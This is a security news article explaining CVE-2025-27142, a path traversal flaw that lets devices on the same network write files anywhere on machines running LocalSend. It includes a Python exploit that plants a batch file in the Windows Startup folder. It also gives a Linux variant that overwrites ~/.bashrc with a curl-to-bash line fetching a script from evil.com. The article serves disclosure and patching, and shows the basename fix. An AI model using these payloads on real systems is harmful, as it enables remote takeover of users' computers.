CVE CyberSecurity Database News

CVE-2025-27142 - Critical Path Traversal and RCE Vulnerability in LocalSend (Pre-1.17.)

Poster -

LocalSend is a popular, open-source application for secure, direct file and message transfers over local networks—no Internet required. It’s loved for its simplicity: install, discover nearby devices, and start sharing files instantly. But beneath its convenience, researchers found a major security flaw before version 1.17. that could let attackers run their own code on your computer just by sending you a transfer request.

What is CVE-2025-27142?

CVE-2025-27142 is a path traversal vulnerability leading to remote command execution (RCE) on any computer running LocalSend before version 1.17.. Simply put: a nearby device on the same Wi-Fi (or LAN) can secretly write files *anywhere* on your computer. On systems like Windows and Linux, dropped files can trigger when your machine restarts or even immediately, depending on where the attacker puts them.

Core Issue:
The endpoints POST /api/localsend/v2/prepare-upload and POST /api/localsend/v2/upload did not sanitize file paths in transfer requests. That means an attacker can manipulate the destination path, bypassing restrictions and landing files outside the intended directory.

How Bad Is It?

If you have LocalSend running in “Quick Save” mode (which auto-accepts files to a folder you pick), the exploit is completely silent. No pop-ups, no warnings. The dangerous files could instantly land in:

The Startup folder (Windows) — triggers malware at next login.

- ~/.bashrc or ~/.profile (Linux) — code executes when you open a terminal.

Exploit Walkthrough (With Code)

Disclaimer: This information is for educational purposes and to help protect yourself. Do not attempt unauthorized attacks.

A malicious device first needs to be on the same network as you, with your machine running a vulnerable version of LocalSend and, ideally, Quick Save enabled.

Simplified code (Dart/Flutter backend)

// routes/upload.dart (before 1.17.)
Future<Response> uploadFile(Request req) async {
  final Map<String, dynamic> jsonBody = jsonDecode(await req.readAsString());
  final String fileName = jsonBody['file_name'];
  final String savePath = '/user/chosen/folder/$fileName'; // NOT VALIDATED!
  final List<int> contents = base64Decode(jsonBody['file_data']);
  await File(savePath).writeAsBytes(contents);
  return Response.ok('Uploaded!');
}

The file name, and thus the full path, is fully controlled by the sender without any checks. No filters against absolute paths or directory traversal (like ../../).

As the attacker, using any HTTP client, send

import requests
import base64

# Target LocalSend instance (replace with victim's IP):
url = 'http://victim-ip:port/api/localsend/v2/upload';

# Malicious payload: writes 'evil.bat' to Windows startup folder
malicious_path = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.bat"
payload = {
    "file_name": malicious_path,
    "file_data": base64.b64encode(b"@echo off\ncalc.exe\n").decode(),
}

r = requests.post(url, json=payload)
print(r.status_code, r.text)

- On Linux? Use ~/.bashrc instead of the startup folder, and a shell script as payload.

Sample Linux HTTP payload (overwrite ~/.bashrc)

malicious_path = "/home/victim/.bashrc"
payload = {
    "file_name": malicious_path,
    "file_data": base64.b64encode(b"curl http://evil.com/payload.sh | bash\n").decode(),
}

3. No User Interaction Needed

If “Quick Save” is enabled, this happens with zero clicks from the user. Even without Quick Save, an attacker could try simple social engineering ("I want to share you a picture - accept this transfer!") and sneak the malicious path in the filename.

How to Stay Safe

Update Now:
Upgrade to LocalSend v1.17. or later.
Download here: LocalSend GitHub Releases

The fix adds strict path validation

final String sanitizedFileName = path.basename(fileName);
// Save only to allowed directory, ignore path traversal.
final String savePath = path.join(userChosenFolder, sanitizedFileName);
// ...write as before.

References

- Official advisory: GitHub Security Advisory - LocalSend
- Full patch diff: 1.17. changes
- CVE details: CVE-2025-27142 on NVD *(link may take time to go live)*

Final Thoughts

CVE-2025-27142 is a great reminder that path handling errors can turn a cool app into a trojan horse, especially when convenience features like “Quick Save” exist. Always keep local network apps up to date, review file-sharing policies, and be careful what you accept—even if it looks friendly.

If you use LocalSend, update immediately and spread the word to your privacy-conscious friends!

Timeline

Published on: 02/25/2025 20:15:37 UTC
Last modified on: 02/28/2025 13:50:54 UTC